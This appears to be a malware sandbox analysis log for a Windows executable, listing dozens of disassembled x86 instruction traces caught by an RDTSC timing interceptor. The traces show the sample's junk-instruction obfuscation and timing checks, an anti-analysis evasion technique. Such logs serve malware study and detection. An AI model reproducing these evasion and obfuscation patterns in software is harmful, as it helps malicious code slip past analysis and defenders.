Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460DAA second address: 7460E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D68h 0x00000009 add ecx, 7AC767C8h 0x0000000f jmp 00007FB0A5355D5Bh 0x00000014 popfd 0x00000015 mov ax, 193Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB0A5355D60h 0x00000024 sbb ecx, 14B26A28h 0x0000002a jmp 00007FB0A5355D5Bh 0x0000002f popfd 0x00000030 mov ah, 23h 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 movzx eax, di 0x00000038 jmp 00007FB0A5355D5Dh 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB0A5355D68h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460E37 second address: 7460E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0049 second address: 73A0061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0061 second address: 73A0097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 9Dh 0x00000011 pushfd 0x00000012 jmp 00007FB0A4FB5B8Ch 0x00000017 xor si, D258h 0x0000001c jmp 00007FB0A4FB5B8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0097 second address: 73A00AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov edi, 348F0746h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00AD second address: 73A00B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00B1 second address: 73A00B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00B7 second address: 73A00BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00BD second address: 73A00C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00C1 second address: 73A00D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00D0 second address: 73A00D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00D4 second address: 73A00E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0726 second address: 73A072A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A072A second address: 73A0730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0730 second address: 73A0737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 39h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0737 second address: 73A0790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB0A4FB5B94h 0x00000011 jmp 00007FB0A4FB5B95h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007FB0A4FB5B90h 0x0000001d adc ax, 69F8h 0x00000022 jmp 00007FB0A4FB5B8Bh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0AC2 second address: 73A0AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0AC8 second address: 73A0ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D000A second address: 73D0051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0A5355D60h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FB0A5355D5Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a call 00007FB0A5355D69h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0051 second address: 73D007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB0A4FB5B97h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D007D second address: 73D0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0095 second address: 73D00C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FB0A4FB5B96h 0x00000012 and esp, FFFFFFF0h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov di, si 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D00C7 second address: 73D00E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ch, 0Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D00E7 second address: 73D0105 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 44h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB0A4FB5B92h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0105 second address: 73D017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB0A5355D64h 0x00000011 xor ax, 98A8h 0x00000016 jmp 00007FB0A5355D5Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB0A5355D68h 0x00000022 adc ax, 8B08h 0x00000027 jmp 00007FB0A5355D5Bh 0x0000002c popfd 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB0A5355D64h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D017E second address: 73D01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB0A4FB5B96h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D01A9 second address: 73D0205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 mov bx, cx 0x00000009 mov si, 4BD1h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB0A5355D5Dh 0x00000017 and esi, 1AE488E6h 0x0000001d jmp 00007FB0A5355D61h 0x00000022 popfd 0x00000023 push eax 0x00000024 pop ecx 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov di, 487Ah 0x0000002c mov ah, dh 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FB0A5355D64h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0205 second address: 73D0214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0214 second address: 73D02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB0A5355D61h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB0A5355D5Ch 0x00000017 sub al, FFFFFFA8h 0x0000001a jmp 00007FB0A5355D5Bh 0x0000001f popfd 0x00000020 mov si, A29Fh 0x00000024 popad 0x00000025 mov edi, dword ptr [ebp+08h] 0x00000028 pushad 0x00000029 mov ebx, ecx 0x0000002b pushfd 0x0000002c jmp 00007FB0A5355D5Ch 0x00000031 and cx, DE08h 0x00000036 jmp 00007FB0A5355D5Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov dword ptr [esp+24h], 00000000h 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jmp 00007FB0A5355D5Bh 0x0000004d mov ecx, 23BDE36Fh 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D02A7 second address: 73D0307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Eh 0x00000009 and ax, 5398h 0x0000000e jmp 00007FB0A4FB5B8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lock bts dword ptr [edi], 00000000h 0x0000001c jmp 00007FB0A4FB5B96h 0x00000021 jc 00007FB114AC7CD1h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB0A4FB5B97h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0307 second address: 73D031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D031F second address: 73D0334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0A4FB5B8Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0334 second address: 73D037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D61h 0x00000009 xor si, 16A6h 0x0000000e jmp 00007FB0A5355D61h 0x00000013 popfd 0x00000014 mov ecx, 538B59D7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop esi 0x0000001d jmp 00007FB0A5355D5Ah 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D037A second address: 73D0380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0380 second address: 73D038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D038F second address: 73D03BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0A4FB5B8Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D03BF second address: 73D0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, cx 0x00000010 pushfd 0x00000011 jmp 00007FB0A5355D64h 0x00000016 and ch, FFFFFF98h 0x00000019 jmp 00007FB0A5355D5Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73F0A50 second address: 73F0A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov ax, bx 0x0000000f pop ebx 0x00000010 mov eax, 73506D63h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB0A4FB5B95h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C2F second address: 7400C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov dx, ax 0x0000000f pushfd 0x00000010 jmp 00007FB0A5355D60h 0x00000015 and ax, 8308h 0x0000001a jmp 00007FB0A5355D5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push dword ptr [ebp+04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C78 second address: 7400C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C7C second address: 7400C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C97 second address: 7400C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C9D second address: 7400CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709A5 second address: 74709A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709A9 second address: 74709AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709AF second address: 74709B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709B5 second address: 74709B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709B9 second address: 74709BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709BD second address: 7470A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB0A5355D60h 0x00000010 or al, 00000068h 0x00000013 jmp 00007FB0A5355D5Bh 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FB0A5355D68h 0x0000001f adc si, 52C8h 0x00000024 jmp 00007FB0A5355D5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esp], ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB0A5355D60h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A29 second address: 7470A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A38 second address: 7470A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A3F second address: 7470A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0A4FB5B8Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A54 second address: 7470A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A6C second address: 7470A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A87 second address: 7470ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BAh 0x00000005 jmp 00007FB0A5355D60h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB0A5355D67h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470ABB second address: 7470AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470AC1 second address: 7470AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470AC5 second address: 7470B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dl, 00000007h 0x0000000b jmp 00007FB0A4FB5B97h 0x00000010 test eax, eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB0A4FB5B94h 0x00000019 jmp 00007FB0A4FB5B95h 0x0000001e popfd 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 je 00007FB114A4B25Fh 0x00000029 jmp 00007FB0A4FB5B8Ah 0x0000002e sub ecx, ecx 0x00000030 jmp 00007FB0A4FB5B91h 0x00000035 inc ecx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FB0A4FB5B8Ch 0x0000003d and esi, 2AC110F8h 0x00000043 jmp 00007FB0A4FB5B8Bh 0x00000048 popfd 0x00000049 mov eax, 611DE62Fh 0x0000004e popad 0x0000004f shr eax, 1 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FB0A4FB5B8Ch 0x0000005a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470B75 second address: 7470B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470B7B second address: 74709A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB114A4B1CAh 0x0000000e jne 00007FB0A4FB5B7Dh 0x00000010 inc ecx 0x00000011 shr eax, 1 0x00000013 jne 00007FB0A4FB5B7Dh 0x00000015 imul ecx, ecx, 03h 0x00000018 movzx eax, dl 0x0000001b cdq 0x0000001c sub ecx, 03h 0x0000001f call 00007FB0A4FC607Dh 0x00000024 cmp cl, 00000040h 0x00000027 jnc 00007FB0A4FB5B97h 0x00000029 cmp cl, 00000020h 0x0000002c jnc 00007FB0A4FB5B88h 0x0000002e shld edx, eax, cl 0x00000031 shl eax, cl 0x00000033 ret 0x00000034 or edx, dword ptr [ebp+0Ch] 0x00000037 or eax, dword ptr [ebp+08h] 0x0000003a or edx, 80000000h 0x00000040 pop ebp 0x00000041 retn 0010h 0x00000044 push ebp 0x00000045 push 00000001h 0x00000047 push edx 0x00000048 push eax 0x00000049 call edi 0x0000004b mov edi, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D57 second address: 7450D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D5B second address: 7450D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D5F second address: 7450D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D65 second address: 7450DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bl, cl 0x0000000f pushad 0x00000010 mov edi, 70EF823Ch 0x00000015 movsx edi, si 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FB0A4FB5B8Ch 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB0A4FB5B8Ah 0x0000002b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450DAD second address: 7450DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450DB3 second address: 7450DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450DB9 second address: 7450DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460574 second address: 7460578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460578 second address: 746057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 746057C second address: 7460582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460582 second address: 74605AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FB0A5355D5Ch 0x0000000b and ah, FFFFFFF8h 0x0000000e jmp 00007FB0A5355D5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 mov di, E01Ah 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
